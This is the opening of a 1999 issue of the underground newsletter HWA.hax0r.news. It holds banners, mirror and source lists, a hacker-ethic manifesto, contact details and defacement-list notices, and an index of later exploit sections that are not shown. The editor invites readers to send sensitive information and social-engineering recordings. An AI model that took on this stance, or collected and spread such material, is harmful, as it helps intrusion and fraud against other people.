
      
      [63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ HWA.hax0r.news ]-=>                         =
  ==========================================================================
    [=HWA'99/2000=]                   Number 48 Volume 1 1999   Dec 26th 99
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================
  
   
   
        (¯`·._(¯`·._(¯`·._(¯`·._( · xmas! · )_.·´¯)_.·´¯)_.·´¯)_.·´¯)
        

      __  ____ __                      __  __      _____    ____ __
     / / / / // / ____  ____  __  __  / / / /___  / <  /___/ / // / __  ______
    / /_/ / // /_/ __ \/ __ \/ / / / / /_/ / __ \/ // / __  / // /_/ / / /_  /
   / __  /__  __/ /_/ / /_/ / /_/ / / __  / /_/ / // / /_/ /__  __/ /_/ / / /_
  /_/ /_/  /_/ / .___/ .___/\__, / /_/ /_/\____/_//_/\__,_/  /_/  \__, / /___/
              /_/   /_/    /____/                               /____/
              
               
                            
               The end is nigh!, cash in your bearer bonds! - sAs
               
          I'm waiting for a $100,206,570 credit on my Visa bill! - Ed
          
           Got plenty of ammo? did you remember to buy gun oil? - Ed
         
                
        
        
        
       (¯`·._(¯`·._(¯`·._(¯`·._( · xmas! · )_.·´¯)_.·´¯)_.·´¯)_.·´¯)
        
                        OH YA, AND HAPPY NEW YEARS
                        
                              Coming soon!
                        
                                 __       __                        __
           ___________________ _/ /______/ /_      ____ _____  ____/ /
          / ___/ ___/ ___/ __ `/ __/ ___/ __ \    / __ `/ __ \/ __  /
         (__  ) /__/ /  / /_/ / /_/ /__/ / / /   / /_/ / / / / /_/ /
        /____/\___/_/   \__,_/\__/\___/_/ /_/    \__,_/_/ /_/\__,_/
               _________  (_) __/ __/    (_)___________  _____  / /
              / ___/ __ \/ / /_/ /_     / / ___/ ___/ / / / _ \/ /
             (__  ) / / / / __/ __/    / (__  |__  ) /_/ /  __/_/
            /____/_/ /_/_/_/ /_/      /_/____/____/\__,_/\___(_)
                        
        
        
        
      (¯`·._(¯`·._(¯`·._(¯`·._( · w00t! · )_.·´¯)_.·´¯)_.·´¯)_.·´¯)
        
   
   
                    ____
                   / ___|_____   _____ _ __ __ _  __ _  ___
                  | |   / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
                  | |__| (_) \ V /  __/ | | (_| | (_| |  __/
                   \____\___/ \_/ \___|_|  \__,_|\__, |\___|
                                                 |___/

                 This is #48 covering Dec 19th to Dec 26th 
                  
                  * Also contains some older material missed from
                    past issues over the last few weeks.
                      
    
  ==========================================================================                             

                         "ABUSUS NON TOLLIT USUM"
                         
  ==========================================================================                         
    
   Mailing list members: 468 Can we bump this up somewhat? spread the word!                          
   
  ==========================================================================                          
   
  
        Today the spotlight may be on you, some interesting machines that
                  have accessed these archives recently...
               
                               _   _       _
                              | | | | ___ | |_
                              | |_| |/ _ \| __|
                              |  _  | (_) | |_
                              |_| |_|\___/ \__|
                               _    _ _ _
                              | |  | (_) |
                              | |__| |_| |_ ___
                              |  __  | | __/ __|
                              | |  | | | |_\__ \
                              |_|  |_|_|\__|___/
                              
                            .gov and .mil activity
                             
                             
                             
  There are some interesting machines among these, the *.nosc.mil boxes are
  from SPAWAR information warfare centres, good to see our boys keeping up
  with the news... - Ed
  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
  
  
  _   ___        ___      _                 ___
 | | | \ \      / / \    | |__   __ ___  __/ _ \ _ __ _ __   _____      _____
 | |_| |\ \ /\ / / _ \   | '_ \ / _` \ \/ / | | | '__| '_ \ / _ \ \ /\ / / __|
 |  _  | \ V  V / ___ \ _| | | | (_| |>  <| |_| | |_ | | | |  __/\ V  V /\__ \
 |_| |_|  \_/\_/_/   \_(_)_| |_|\__,_/_/\_\\___/|_(_)|_| |_|\___| \_/\_/ |___/

  
                             
                             
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
  
                     http://welcome.to/HWA.hax0r.news/                     
                                           
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                                            
  
  
  @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ 
  #                                                                         #
  @      The HWA website is sponsored by CUBESOFT communications I highly   @ 
  #      recommend you consider these people for your web hosting needs,    #
  @                                                                         @   
  #      Web site sponsored by CUBESOFT networks http://www.csoft.net       #
  @      check them out for great fast web hosting!                         @ 
  #                                                                         # 
  #      http://www.csoft.net/~hwa                                          @
  @                                                                         #  
  @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
                    
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       


          _   _            _             _    _____ _   _     _
         | | | | __ _  ___| | _____ _ __( )__| ____| |_| |__ (_) ___
         | |_| |/ _` |/ __| |/ / _ \ '__|/ __|  _| | __| '_ \| |/ __|
         |  _  | (_| | (__|   <  __/ |   \__ \ |___| |_| | | | | (__
         |_| |_|\__,_|\___|_|\_\___|_|   |___/_____|\__|_| |_|_|\___|



     Sadly, due to the traditional ignorance and sensationalizing of the mass
     media, the once-noble term hacker has become a pejorative.
     
     Among true computer people, being called a hacker is a compliment. One of
     the traits of the true hacker is a profoundly antibureaucratic and
     democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
     
     This ethic was best formulated by Steven Levy in his 1984 book Hackers:
     Heroes of the Computer Revolution. Its tenets are as follows:

      1 - Access to computers should be unlimited and total. 
      2 - All information should be free. 
      3 - Mistrust authority - promote decentralization. 
      4 - Hackers should be judged by their hacking not bogus criteria such as
          degrees, age, race, or position. 
      5 - You create art and beauty on a computer.
      6 - Computers can change your life for the better. 

     The Internet as a whole reflects this ethic.


  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       


             _____                          _   _   _
            |  ___|__  _ __ _ __ ___   __ _| |_| |_(_)_ __   __ _
            | |_ / _ \| '__| '_ ` _ \ / _` | __| __| | '_ \ / _` |
            |  _| (_) | |  | | | | | | (_| | |_| |_| | | | | (_| |
            |_|  \___/|_|  |_| |_| |_|\__,_|\__|\__|_|_| |_|\__, |
                                                            |___/

               A Comment on FORMATTING: 
               
               
               Oct'99 - Started 80 column mode format, code is still left
                        untouched since formatting will destroy syntax.               
               
   
               I received an email recently about the formatting of this
               newsletter, suggesting that it be formatted to 75 columns
               in the past I've endeavoured to format all text to 80 cols
               except for articles and site statements and urls which are
               posted verbatim, I've decided to continue with this method
               unless more people complain, the zine is best viewed in
               1024x768 mode with UEDIT.... - Ed
               
               BTW if anyone can suggest a better editor than UEDIT for
               this thing send me some email i'm finding it lacking in
               certain areas. Must be able to produce standard ascii.    
                       
  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
  
                       __  __ _
                      |  \/  (_)_ __ _ __ ___  _ __ ___
                      | |\/| | | '__| '__/ _ \| '__/ __|
                      | |  | | | |  | | | (_) | |  \__ \
                      |_|  |_|_|_|  |_|  \___/|_|  |___/

                       


     New mirror sites
               
  ***   http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp   *** NEW *** 
  ***   http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ ***      
        http://datatwirl.intranova.net * NEW * 
        http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
        http://net-security.org/hwahaxornews
        http://www.sysbreakers.com/hwa
        http://www.attrition.org/hosted/hwa/
        http://www.ducktank.net/hwa/issues.html.          
        http://hwazine.cjb.net/
        http://www.hackunlimited.com/files/secu/papers/hwa/
        http://www.attrition.org/~modify/texts/zines/HWA/       
                         
      * http://hwa.hax0r.news.8m.com/           
      * http://www.fortunecity.com/skyscraper/feature/103/  
               
      * Crappy free sites but they offer 20M & I need the space...
     ** Some issues are not located on these sites since they exceed
        the file size limitations imposed by the sites :-( please
        only use these if no other recourse is available.
                
    *** Most likely to be up to date other than the main site.    
                        
                        
     
     HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
     thanks to airportman for the Cubesoft bandwidth. Also shouts out to all 
     our mirror sites! and p0lix for the (now expired) digitalgeeks archive
     tnx guys. 
     
     http://www.csoft.net/~hwa
     
     
     HWA.hax0r.news Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
     http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
     http://www.attrition.org/hosted/hwa/
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://www.ducktank.net/hwa/issues.html. ** NEW **
     http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
     http://www.csoft.net/~hwa/ 
     http://www.digitalgeeks.com/hwa. *DOWN*
     http://members.tripod.com/~hwa_2k
     http://welcome.to/HWA.hax0r.news/
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://www.projectgamma.com/archives/zines/hwa/
     http://www.403-security.org/Htmls/hwa.hax0r.news.htm

   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=         
   
   
  
 
                    ____                              _
                   / ___| _   _ _ __   ___  _ __  ___(_)___
                   \___ \| | | | '_ \ / _ \| '_ \/ __| / __|
                    ___) | |_| | | | | (_) | |_) \__ \ \__ \
                   |____/ \__, |_| |_|\___/| .__/|___/_|___/
                          |___/            |_|

     
   
   SYNOPSIS (READ THIS)
   --------------------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended however, to complement such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, it's a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... <g>
   
   

   @HWA

   =-----------------------------------------------------------------------=

                     Welcome to HWA.hax0r.news ... 

   =-----------------------------------------------------------------------=
   
   
    
    We could use some more people joining the channel, it's usually pretty
    quiet, we don't bite (usually) so if you're hanging out on irc stop
    by and idle a while and say hi...   
    
    **************************************************************************   
    
    
    "If life is a waste of time and time is a waste of life, then let's all get
     wasted and have the time of our lives"
    						- kf

   
                            ____|  _|            |
                            __|   |   __ \   _ \ __|
                            |     __| |   |  __/ |
                           _____|_|  _|  _|\___|\__| 

     
                        Eris Free Net #HWA.hax0r.news
    
    **************************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed   ***
    ***                                                                    ***
    *** please join to discuss or impart news on the zine and around the   ***
    *** scene or just to hang out, we get some interesting visitors you    ***
    *** could be one of em.                                                ***
    ***                                                                    ***
    *** Note that the channel isn't there to entertain you its purpose is  ***
    *** to bring together people interested and involved in the underground***
    *** to chat about current and recent events etc, do drop in to talk or ***
    *** hangout. Also if you want to promo your site or send in news tips  ***
    *** its the place to be, just remember we're not #hack or #chatzone... ***
    **************************************************************************

      
    
    


  =--------------------------------------------------------------------------=
  
  
                     _____            _             _  
                    / ____|          | |           | |
                   | |     ___  _ __ | |_ ___ _ __ | |_ ___
                   | |    / _ \| '_ \| __/ _ \ '_ \| __/ __|
                   | |___| (_) | | | | ||  __/ | | | |_\__ \
                    \_____\___/|_| |_|\__\___|_| |_|\__|___/


           
  =--------------------------------------------------------------------------=
  [ INDEX ]
  =--------------------------------------------------------------------------=
    Key     Intros                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. COPYRIGHTS ......................................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. SOURCES .........................................................
    00.3  .. THIS IS WHO WE ARE ..............................................
    00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
    00.5  .. THE HWA_FAQ V1.0 ................................................
            
             ABUSUS NON TOLLIT USUM? 
             This is (in case you hadn't guessed) Latin, and loosely translated
             it means "Just because something is abused, it should not be taken
             away from those who use it properly". This is our new motto.

  =--------------------------------------------------------------------------=
    Key     Content 
  =--------------------------------------------------------------------------=
  
  
    "The three most dangerous things in the world are a programmer with a
     soldering iron, a hardware type with a program patch and a user with
     an idea." - Unknown

  

    01.0  .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
    02.0  .. From the Editor.................................................. 
    03.0  .. Socks proxies, Wingates and more from IRC4ALL....................
    04.0  .. Cyberarmy Proxies, Accounts and Wingates etc (* If available)....
    05.0  .. Belgium: Security of Banksys compromised.........................
    06.0  .. Public access mail servers.......................................
    07.0  .. Santa Claus about to lose his domain name for nonpayment? .......
    08.0  .. Interview with NFO (Nine Forty One Group)........................
    09.0  .. The History of IRC (Internet Relay Chat).........................
    10.0  .. Pagoo Internet voice MailBox by Loophole/HHP.....................
    11.0  .. Top 11 Stories of 1999 according to HNN..........................
    12.0  .. AntiVirus scanning and misused tools.............................
    13.0  .. RST Sets the Record Straight ....................................
    14.0  .. Russian Politician Threatens Cyber Attack .......................
    15.0  .. PCR-1000 Control Suite Released by Ghetto.org ...................
    16.0  .. Nuclear Power Plant Y2K Readiness ...............................
    17.0  .. New E-zines Released ............................................
    18.0  .. Digi.no publishes Script Kiddie Rant ............................
    19.0  .. w00w00 Con 1999..................................................
    20.0  .. pops.c popmail scanner by duro...................................
    21.0  .. Cypherpunks meeting announcement.................................
    22.0  .. Microsoft security bulletin MS99-046 Windows NT 4.0 SP4 or SP5...
    23.0  .. [ISN] Hacker Shootouts?..........................................
    24.0  .. [ISN] 21 yr old secures $53Mil for high-tech startup.............
    25.0  .. [ISN] Netscape Security Flaw Revealed............................
    26.0  .. [ISN] Cyberterrorism hype........................................
    27.0  .. [ISN] The Beijing Hack Attack....................................
    28.0  .. [ISN] Most cybercrime goes unpunished............................
    29.0  .. [ISN] Jubilant Zhirinovsky wants to hack western computers.......
    30.0  .. [ISN] Tribe and Trinoo, two new virulent virii...................
    31.0  .. [ISN] As New Year nears, threat of Net attack program mounts.....
    32.0  .. [ISN] Hackers hack sites to promote hacking hiatus for y2k (!?)..
    33.0  .. [ISN] How to report internet related crime.......................
    34.0  .. [ISN] Ten risks of PKI (Public Key Infrastructure)...............
    35.0  .. [ISN] Forbes says he'll ditch all crypto export controls.........
    36.0  .. [ISN] Zyklon claims his crime was "no big deal" .................
    37.0  .. [ISN] Security Wire Digest Volume 1..............................
    38.0  .. mailx.c slackware 3.6 local exploit..............................
    39.0  .. cmsdex.c Solaris (2.6 / 7.0) remote exploit......................
    40.0  .. xsoldierx.c FreeBSD 3.3 local exploit by Brock Tellier...........
    41.0  .. rpc.autofsd.c FreeBSD/misc remote exploit by guidob..............
    42.0  .. iplenght.c Redhat 5.1 + Debian 2.1 DoS exploit by Andrea Arcangeli.
    43.0  .. truck.c UnixWare 7.1 local exploit by Brock Tellier..............
        
    =-------------------------------------------------------------------------------=
    
        
    AD.S  .. Post your site ads or etc here, if you can offer something in return
             thats tres cool, if not we'll consider ur ad anyways so send it in.
             ads for other zines are ok too btw just mention us in yours, please
             remember to include links and an email contact. Corporate ads will
             be considered also and if your company wishes to donate to or 
             participate in the upcoming Canc0n99 event send in your suggestions
             and ads now...n.b date and time may be pushed back join mailing list
             for up to date information.......................................
             Current dates: POSTPONED til further notice, place: TBA..........
    Ha.Ha .. Humour and puzzles  ............................................
             
              Hey You!........................................................
              =------=........................................................
              
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................
 
  =--------------------------------------------------------------------------=
     
     @HWA'99
     
     

     
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      
                            _                     _
                           | |    ___  __ _  __ _| |
                           | |   / _ \/ _` |/ _` | |
                           | |__|  __/ (_| | (_| | |
                           |_____\___|\__, |\__,_|_|
                                      |___/


          THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
          OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
          WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
          (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
          READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
     
          Important semi-legalese and license to redistribute:
     
          YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
          AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
          ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
          IN YOUR WRITING. LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE
          APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
          IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
          ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
          ME PRIVATELY current email cruciphux@dok.org
     
          THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
          WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
          THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
          I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
          AND REDISTRIBUTE/MIRROR. - EoD
     
     
          Although this file and all future issues are now copyright, some of
         the content holds its  own copyright and these are printed and
         respected. News is news so i'll print any and all news but will quote
         sources when the source is known, if it's good enough for CNN it's good
         enough for me. And i'm doing it for free on my own time so pfffft. :)
     
         No monies are made or sought through the distribution of this material.
         If you have a problem or concern email me and we'll discuss it.
     
         cruciphux@dok.org
     
         Cruciphux [C*:.]



00.1 CONTACT INFORMATION AND MAIL DROP 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                     ____            _             _
                    / ___|___  _ __ | |_ __ _  ___| |_ ___
                   | |   / _ \| '_ \| __/ _` |/ __| __/ __|
                   | |__| (_) | | | | || (_| | (__| |_\__ \
                    \____\___/|_| |_|\__\__,_|\___|\__|___/


     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:
    

	    HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5
	    
	    
    
    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
    ~~~~~~~  reading this from some interesting places, make my day and get a
             mention in the zine, send in a postcard, I realize that some places
             it is cost prohibitive but if you have the time and money be a cool
             dude / gal and send a poor guy a postcard preferably one that has some
             scenery from your place of residence for my collection, I collect stamps
             too so you kill two birds with one stone by being cool and mailing in a
             postcard, return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. <g>
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.
    
    
    Stuff you can email:
    
    - Prank phone calls in .ram or .mp* format
    - Fone tones and security announcements from PBX's etc
    - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
    - reserved for one smiley face ->        :-)            <-
    - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
    - burns of phac cds (email first to make sure we don't already have em)
    - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
    

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it <BeG>

    Our current email:

    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org                                                                   
    Distribution/Website........: sas2@usa.net       
    
    Other methods:
    
    Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use for lame questions!
    My Preferred chat method: IRC Efnet in #HWA.hax0r.news

    @HWA



00.2 Sources ***
     ~~~~~~~~~~~
      
                      ____
                     / ___|  ___  _   _ _ __ ___ ___ ___
                     \___ \ / _ \| | | | '__/ __/ _ Y __|
                      ___) | (_) | |_| | | | (_|  __|__ \
                     |____/ \___/ \__,_|_|  \___\___|___/


     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.

    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
    News site (HNN) .....,............http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
    NewsTrolls .(daily news ).........http://www.newstrolls.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/
    News/Humour site+ ................http://www.innerpulse.com
    News/Techie news site.............http://www.slashdot.org
    
    

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    win2kbugtraq
    <+others>

    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    PLEASE if you have any changes or additions for this section please
    mail them to cruciphux@dok.org. Thank you.
    
    
    http://www.cnn.com/SEARCH/
       
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
        
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
        
    http://www.ottawacitizen.com/business/
        
    http://search.yahoo.com.sg/search/news_sg?p=hack
        
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
        
    http://www.zdnet.com/zdtv/cybercrime/
        
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
        
    NOTE: See appendices for details on other links.
    


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
        
    http://freespeech.org/eua/ Electronic Underground Affiliation
        
    http://ech0.cjb.net ech0 Security
    
    http://axon.jccc.net/hir/ Hackers Information Report
        
    http://net-security.org Net Security
        
    http://www.403-security.org Daily news and security related site
    
    http://www.hack.co.za/ Current exploits archive
        

    Submissions/Hints/Tips/Etc
    ~~~~~~~~~~~~~~~~~~~~~~~~~~
    
            ____        _               _         _
           / ___| _   _| |__  _ __ ___ (_)___ ___(_) ___  _ __  ___
           \___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|
            ___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \
           |____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/


    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care whether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed

    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
    
    
    ATTRITION.ORG's Website defacement mirror and announcement lists
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    http://www.attrition.org/mirror/attrition/    
    http://www.attrition.org/security/lists.html
    
    --
      
      defaced [web page defacement announce list]
      
      This is a public LOW VOLUME (1) mail list to circulate news/info on 
      defaced web sites. To subscribe to Defaced, send mail to 
      majordomo@attrition.org with "subscribe defaced" in the BODY of 
      the mail.
      
      There will be two types of posts to this list:
      
              1. brief announcements as we learn of a web defacement.
                 this will include the site, date, and who signed the 
                 hack. we will also include a URL of a mirror of the hack.
      
              2. at the end of the day, a summary will be posted
                 of all the hacks of the day. these can be found
                 on the mirror site listed under 'relevant links'
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: mcintyre@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
      (1) It is low volume on a normal day. On days of many defacements,
          traffic may be increased. On a few days, it is a virtual mail
          flood. You have been warned. ;)
      
    -=-
    
    --
      
      defaced summary [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced domains on a given day. To subscribe to Defaced-Summary, send mail to 
      majordomo@attrition.org with "subscribe defaced-summary" in the BODY of 
      the mail.
      
      There will be ONE type of post to this list:
      
              1. a single nightly piece of mail listing all reported
                 domains. the same information can be found on
                 http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
              
     -=-
     
      defaced GM [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced government and military domains on a given day. To subscribe to 
      Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" 
      in the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personnel charged with tracking security incidents on
      government run networks.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
     
      --
      
      defaced alpha [web page defacement announce list]
      
      This is a low traffic mail list to announce via alpha-numeric
      pagers, all publicly defaced government and military domains 
      on a given day. To subscribe to Defaced-Alpha, send mail to 
      majordomo@attrition.org with "subscribe defaced-alpha" in 
      the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the information
                 will only include domain names. the same information 
